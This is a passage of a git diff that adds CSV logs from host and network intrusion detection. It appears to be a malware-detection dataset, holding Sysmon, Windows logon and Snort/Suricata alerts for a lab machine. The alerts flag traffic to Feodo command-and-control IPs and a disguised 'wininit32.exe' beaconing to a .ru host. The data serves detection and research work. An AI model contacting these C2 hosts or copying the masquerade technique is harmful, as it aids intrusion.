service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.074132100Z"",""eventRecordID"":""566"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:51.695",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.066966500Z"",""eventRecordID"":""564"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 24, 2020 @ 12:49:51.682",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.066422000Z"",""eventRecordID"":""563"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:51.491",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 12:49:50.437",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x36A3A + Linked Logon ID: 0x36A0B + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3dc + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:49:50.390",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x36A0B + Linked Logon ID: 0x36A3A + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3dc + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:49:49.336",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 24, 2020 @ 12:49:47.888",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:49:45.827",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 24, 2020 @ 12:49:09.981",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 12:49:09.968",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 12:48:00.246",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : 'fc7a35e4b9cb3f1aa594dae63bcb0752' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : '4428ae482d529a552955f4521ecc3337d5001df3' +", +"Apr 24, 2020 @ 12:48:00.199",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +", +"Apr 24, 2020 @ 12:47:01.564",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'ae09c56e1fd86a6650742bdb6dcf5dae' +New md5sum is : '9c6c66c01d494672cf9c5daac269b542' +Old sha1sum was: 'b04ea1a9371494b1768f710b30ca41fb2a9a2004' +New sha1sum is : 'c813b7e7b36cfefc54b34a27f0216ea1dbc5e53c' +", +"Apr 24, 2020 @ 12:47:01.533",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '8776cf6928f2de374d1a329d7b0948c3' +New md5sum is : '25da9275704be5bcd294856c17c985ff' +Old sha1sum was: '520ae6cd4e088c14c27c500ba09b18024715ec29' +New sha1sum is : 'b9157e374dc4edd20b987372a7142da352d2a9e4' +", +"Apr 24, 2020 @ 12:47:00.096",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1470613 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.105.208.173:123) is working properly.""" +"Apr 24, 2020 @ 12:46:23.415",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:46:18.619",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 12:46:09.877",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:10:56Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:45:37.297",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 12:44:37.857",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 12:44:37.841",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 12:44:31.701",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '1af7f0914012f801bdabc07119bd84db' +New md5sum is : '271f59daf9ca28fbeb0bd234897e1662' +Old sha1sum was: '98d0a499a8ec59bdfd79d0750a971a939fa5e3a2' +New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +", +"Apr 24, 2020 @ 12:44:30.591",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '808c317f44b41ac662c03e64ae191df7' +New md5sum is : '47f9a8fc035cc80b23dfd8be4d23cda6' +Old sha1sum was: 'cc7c06123ee56b0fe3d451e87d288d35e76cb4de' +New sha1sum is : '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +", +"Apr 24, 2020 @ 12:44:30.575",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c6e83335e428d012cffb29f1570868b1' +New md5sum is : '480a7b1436febced63b663e198db057e' +Old sha1sum was: 'e1de9238546bfb9f39c43db2beee554f6c05d8a8' +New sha1sum is : 'a366c53c7d877bd13ac0386830dbad1b52127af9' +", diff --git a/data/MW_3_HIDS_3.csv b/data/MW_3_HIDS_3.csv new file mode 100644 index 0000000..2f17260 --- /dev/null +++ b/data/MW_3_HIDS_3.csv @@ -0,0 +1,21 @@ +timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine" +"May 22, 2020 @ 16:34:41.021",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : 'a18eb7d2d71c498e6c68f4d4ae0641c7' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '4458c74e5e5b43abcaa686c52ebb00d5149c3406' +", +"May 22, 2020 @ 16:34:41.006",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : '2dff0dec78c8ef123f08b1e2d23e5734' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : 'd900f31683f204db3e8408c6a0391eed28337ae9' +", +"May 22, 2020 @ 16:33:13.411",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 22, 2020 @ 16:33:04.030",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 22, 2020 @ 16:28:47.269",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", diff --git a/data/MW_3_NIDS.csv b/data/MW_3_NIDS.csv new file mode 100644 index 0000000..ae0b178 --- /dev/null +++ b/data/MW_3_NIDS.csv @@ -0,0 +1,7 @@ +"@timestamp",message,"log.file.path" +"Apr 4, 2020 @ 15:17:53.844","04/04-15:17:47.716250 [**] [1:2404312:5676] ET CNC Feodo Tracker Reported CnC Server TCP group 7 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50356 -> 181.135.153.203:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 15:17:53.814","04/04/2020-15:17:47.716250 [**] [1:2404306:5677] ET CNC Feodo Tracker Reported CnC Server group 7 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50356 -> 181.135.153.203:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 15:17:28.805","04/04-15:17:22.852731 [**] [1:2404320:5676] ET CNC Feodo Tracker Reported CnC Server TCP group 11 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50341 -> 189.173.113.67:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 15:17:28.805","04/04/2020-15:17:22.852731 [**] [1:2404310:5677] ET CNC Feodo Tracker Reported CnC Server group 11 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50341 -> 189.173.113.67:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 15:15:53.792","04/04/2020-15:15:52.336603 [**] [1:2404324:5677] ET CNC Feodo Tracker Reported CnC Server group 25 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50278 -> 96.20.84.254:7080","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 15:15:53.792","04/04-15:15:52.336603 [**] [1:2404348:5676] ET CNC Feodo Tracker Reported CnC Server TCP group 25 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50278 -> 96.20.84.254:7080","/var/log/snort/alert.fast" diff --git a/data/MW_4_HIDS_3.csv b/data/MW_4_HIDS_3.csv new file mode 100644 index 0000000..9e88729 --- /dev/null +++ b/data/MW_4_HIDS_3.csv @@ -0,0 +1,134 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 26, 2020 @ 16:22:13.549",14,"ATT&CK: Suspicious Program Location with Network Connections","""Network connection detected: +RuleName: Usermode +UtcTime: 2020-05-26 16:22:08.212 +ProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300} +ProcessId: 3772 +Image: C:\Users\Public\Documents\wininit32.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 49733 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 91.240.87.131 +DestinationHostname: remindarb.fvds.ru +DestinationPort: 80 +DestinationPortName: http""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T16:22:09.493057500Z"",""eventRecordID"":""1641"",""processID"":""2080"",""threadID"":""1180"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-05-26 16:22:08.212\r\nProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300}\r\nProcessId: 3772\r\nImage: C:\\Users\\Public\\Documents\\wininit32.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 49733\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 91.240.87.131\r\nDestinationHostname: remindarb.fvds.ru\r\nDestinationPort: 80\r\nDestinationPortName: http\""""},""eventdata"":{""ruleName"":""Usermode"",""utcTime"":""2020-05-26 16:22:08.212"",""processGuid"":""{df9fc3d3-41ca-5ecd-0000-001001f90300}"",""processId"":""3772"",""image"":""C:\\\\Users\\\\Public\\\\Documents\\\\wininit32.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""49733"",""destinationIsIpv6"":""false"",""destinationIp"":""91.240.87.131"",""destinationHostname"":""remindarb.fvds.ru"",""destinationPort"":""80"",""destinationPortName"":""http""}}}", +"May 26, 2020 @ 16:22:03.549",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '3e52d3c90dc2ce2a10b60303bfa665d8' +New md5sum is : '822a2f102de1e8d2a0e370ffe3de779d' +Old sha1sum was: '6e5b745544851872c6f1e39e9d91a6195e1ecf30' +New sha1sum is : '35f1effa6a998ff6100516208e2c27c97e4ae9f8' +", +"May 26, 2020 @ 16:22:03.533",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '724cdf662876b7f16830bfbeb2ac9b3a' +New md5sum is : '9a9fee6d5a36d0bdb2b1909600157f05' +Old sha1sum was: 'eb3a1f0df599d4e06740b3159f04bf6b12fbffc7' +New sha1sum is : 'b32d7a1dfdd857d79c6f2b5d7103a6b11e3e46b5' +", +"May 26, 2020 @ 16:21:51.970",14,"ATT&CK: Suspicious Program Location with Network Connections","""Network connection detected: +RuleName: Usermode +UtcTime: 2020-05-26 16:21:47.389 +ProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300} +ProcessId: 3772 +Image: C:\Users\Public\Documents\wininit32.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 49728 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 91.240.87.131 +DestinationHostname: remindarb.fvds.ru +DestinationPort: 80 +DestinationPortName: http""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T16:21:48.506365300Z"",""eventRecordID"":""1632"",""processID"":""2080"",""threadID"":""1180"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-05-26 16:21:47.389\r\nProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300}\r\nProcessId: 3772\r\nImage: C:\\Users\\Public\\Documents\\wininit32.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 49728\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 91.240.87.131\r\nDestinationHostname: remindarb.fvds.ru\r\nDestinationPort: 80\r\nDestinationPortName: http\""""},""eventdata"":{""ruleName"":""Usermode"",""utcTime"":""2020-05-26 16:21:47.389"",""processGuid"":""{df9fc3d3-41ca-5ecd-0000-001001f90300}"",""processId"":""3772"",""image"":""C:\\\\Users\\\\Public\\\\Documents\\\\wininit32.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""49728"",""destinationIsIpv6"":""false"",""destinationIp"":""91.240.87.131"",""destinationHostname"":""remindarb.fvds.ru"",""destinationPort"":""80"",""destinationPortName"":""http""}}}", +"May 26, 2020 @ 16:21:43.752",14,"ATT&CK: Suspicious Program Location with Network Connections","""Network connection detected: +RuleName: Usermode +UtcTime: 2020-05-26 16:21:40.112 +ProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300} +ProcessId: 3772 +Image: C:\Users\Public\Documents\wininit32.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 49718 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 216.239.36.21 +DestinationHostname: +DestinationPort: 80 +DestinationPortName: http""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T16:21:41.224969400Z"",""eventRecordID"":""1627"",""processID"":""2080"",""threadID"":""1180"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-05-26 